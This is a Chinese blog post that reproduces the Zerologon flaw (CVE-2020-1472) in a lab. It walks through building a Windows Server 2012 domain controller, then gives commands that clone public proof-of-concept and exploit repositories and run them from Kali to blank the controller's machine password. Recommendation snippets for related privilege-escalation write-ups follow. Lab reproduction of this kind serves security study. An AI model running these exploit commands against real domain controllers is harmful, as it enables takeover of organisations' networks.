CVE-2020-1472复现打域控(包含Win Server 2012域环境搭建)

已于 2022-10-21 10:35:09 修改
阅读量1.2k 收藏 1
点赞数
分类专栏: 网络渗透 漏洞挖掘 文章标签: 渗透测试 网络安全 python
于 2022-10-21 10:17:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/void_zk/article/details/127440366
版权

CVE-2020-1472复现打域控(包含Win Server 2012域环境搭建)

目的

Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。

复现环境

DC:os:windows 2012 server ip:192.168.59.141
攻击机:os:kali ip:192.168.59.128

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation)

Win Server 2012域环境搭建

搭建windows server 2012域环境
安装虚拟机Windows server2012R2标准版

在这里插入图片描述

分配足够大的内存(至少8G)
在这里插入图片描述

等待安装成功
在这里插入图片描述

启动管理员账户Administrator,设置新的密码
在这里插入图片描述

注销当前账户,登录到Adminnistrator账户
在这里插入图片描述

设置静态IP地址192.168.92.145
在这里插入图片描述

添加DNS服务器
在这里插入图片描述

安装成功后进入DNS管理
在这里插入图片描述

创建一个正向解析记录
在这里插入图片描述

创建成功
在这里插入图片描述

添加角色或功能,添加AD域服务
在这里插入图片描述

安装成功将此服务器提升为域控制器
在这里插入图片描述

建立新林
在这里插入图片描述

设置密码
在这里插入图片描述

提供凭证,输入管理员账号密码
在这里插入图片描述

设置NETBIOS域名
在这里插入图片描述
下一步至先决条件检查,不意外的话点击安装并重启
在这里插入图片描述

重启之后添加角色或功能,安装IIS服务,
在这里插入图片描述
搭建完毕后,可以使用Netdom query fsmo命令查看域环境信息
在这里插入图片描述

nbtstat -n 获取当前机器的NetBIOS名称
在这里插入图片描述
查看域控主机ip地址
在这里插入图片描述至此域环境搭建完毕

CVE-2020-1472 复现

下载poc:https://github.com/SecuraBV/CVE-2020-1472
验证漏洞是否存在:

python3 /home/kali/Desktop/zerologon_tester.py  WIN-PEB4H6RPOC2  192.168.59.141

如下图所示,漏洞存在
在这里插入图片描述

下载exp: git clone https://github.com/dirkjanm/CVE-2020-1472
置空DC的密码

python3 /home/kali/Desktop/cve-2020-1472-exploit.py WIN-PEB4H6RPOC2 192.168.59.141

在这里插入图片描述

至此我们就成功地将域控中保存在AD中的管理员password设置为空,方便下一步的渗透。

23hours
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-1472渗透 NetLogon 权限提升漏洞
千寻的博客
06-13 241
模拟环境:获取了一个加入了的计算机权限,在system账号权限的情况下,将管密码置空,导出管hash,然后进行连接
微软通杀漏洞-CVE-2021-1675复现
Gamma_lab的博客
08-06 410
环境 受害机:window2019(192.168.153.133) 攻击机:kali(192.168.153.134) 利用前提 或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限 一定需要:一个普通的用户 一定需要:开启Spooler服务 环境搭建 安装impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py insta
CVE-2020-1472复现
sinat_36853972的博客
09-21 1198
CVE-2020-1472复现 简介 Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空 复现环境 DC: os:windows 2012 server ip:192.168.106.137 攻击机: os:kali ip:192.168.106.129 影响版本 Windows Server 2008 R2 for x64-based Systems Service P
【漏洞复现篇】CVE-2020-1472-微软NetLogon权限提升-手把手教学-简单环境搭建与Exp执行
安道实验室
09-19 343
Netlogon特权提升漏洞 (CVE-2020-1472)
越努力 越自由
03-18 4518
2020年8月份微软发布的安全公告中,有一个十分紧急的漏洞——CVE-2020-1472 NetLogon 权限提升漏洞。通过该漏洞,未经身份验证的攻击者只需要能访问域控的135端口即可通过 NetLogon 远程协议连接域控并重置域控机器的Hash,从而导致攻击者可以利用域控的机器账户导出内所有用户的Hash(域控的机器账户默认具有DCSync权限)。该漏洞存在的原因是Netlogon协议中加密模块存在问题,导致攻击者能够在没有有效凭据的情况下通过身份认证。
环境搭建+复现CVE-2020-1472 NetLogon 内提权漏洞
daxi0ng的博客
01-25 3949
0x00 简介 Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在内网络上的认证,以及复制数据库以进行域控备份,还用于维护成员与之间、域控之间、DC与跨DC之间的关系。 Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote procedure call protocol,远程过程调用协议,允许像调用本地服务一样调用远程服务)接口,用于对中的用户和其他服务进行身份验证,最常见的是方便用户使用NTLM(N...
看我拿下域控-cve2020-1472-Netlogon
weixin_43227251的博客
04-13 637
cve2020-1472 文章目录cve2020-1472简介影响版本环境简介DCAttack漏洞验证漏洞利用利用复现环境配置安装Impacket下载EXP置空密码获取HASH获取SHELL获取原HASH解HASH恢复HASH检查是否恢复 简介 2020年8月11号,微软修复了Netlogon 特权提升漏洞,当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应
CVE-2022-26923权限提升漏洞复现
ordar123的博客
05-27 1117
本文首发于蛇矛实验室:https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA 环境搭建 域控 选择一台winserver2016搭建域控服务,这里是winserver2016。选择Active Directory 服务,其他默认即可。 安装完成之后,提升为域控制器,开始配置域控。 添加新林rangenet.cn,其他默认,然后一步步到安装完成。 ADCS搭建 下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。 服务器管理器–>添
2024年最全CVE-2024-26923漏洞分析_cve-2024–26923(1),2024最新网易网络安全面试题目
最新发布
2401_84544363的博客
05-05 1132
本次漏洞产生的主要原因是计算机账户关键属性的ACL设置问题和ADCS检查客户端身份不严格导致,结合之前的samAccountName欺骗漏洞,AD中涉及身份认证标识的问题不止一次,微软在AD中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。本次漏洞利用简单,流量特征不明显难以检测,同时获取的AD证书有效时间长,因此对于AD的提权和权限维持都有很高的利用价值。
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 704
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
记一次从linux打进域控
hackzkaq的博客
03-20 833
这个周的话比较忙,就简单复盘一次之前从linux打进域控所涉及的内容,整体来说比较容易理解,从信息收集到权限维持都有所涉及。
CVE-2019-0803.rar
01-05
windows 7 实测本地提权通过 2008实测部分通过 之后的因为环境原因未有实测 使用方式未 exe + cmd+命令 !进步更大!!!!!
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
CVE-2017-11882
12-09
CVE-2017-11882,用于创建钓鱼word,可以添加命令,用来反弹shell,可以用powershell
CVE-2021-26855
03-12
CVE-2021-26855-PoC CVE-2021-26855的PoC漏洞利用代码。 原始代码由开发。 添加其他功能(用户枚举等)后不久,原始存储库被删除。 如果您有最新版本,请发布拉取请求。 CVE-2021-26855 SSRF轻松使用Golang练习 受影响的版本: Exchange Server 2013小于CU23 Exchange Server 2016小于CU18 Exchange Server 2019小于CU7 使用条件: 此漏洞与以前的交换漏洞不同。 此漏洞不需要可以登录的用户身份。它可以在未经授权的情况下获取内部用户资源。 它可以与CVE-2021-27065一起使用以实现远程命令执行。 漏洞触发要求: Vulnerability in the target server The target exchange server must be a
如何攻击域控
02-03 551
在Active Directory中获得管理员权限的攻击方法 https://adsecurity.org/?p=2362 Kerberos票证:理解和利用 https://www.tarlogic.com/en/blog/kerberos-tickets-comprehension-and-exploitation/ Kerberos(I):Kerberos如何工作?–理论 http...
[内网渗透]—NetLogon 内提权漏洞(CVE-2020-1472)
Sentiment的博客
12-16 627
CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取管访问权限(将域控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。获取了一个加入了的计算机权限,在普通账号的情况下,将管密码置空,导出管hash,然后进行连接。
内大杀器CVE-2020-1472复现
茶寂的博客
12-25 5586
前一段时间打ctf第一次接触渗透,其中CVE-2020-1472被称为域控的大杀器,在本地搭建了个环境复现一下 CVE-2020-1472影响的版本: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Ser
Tomact_CVE-2020-1938漏洞复现
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值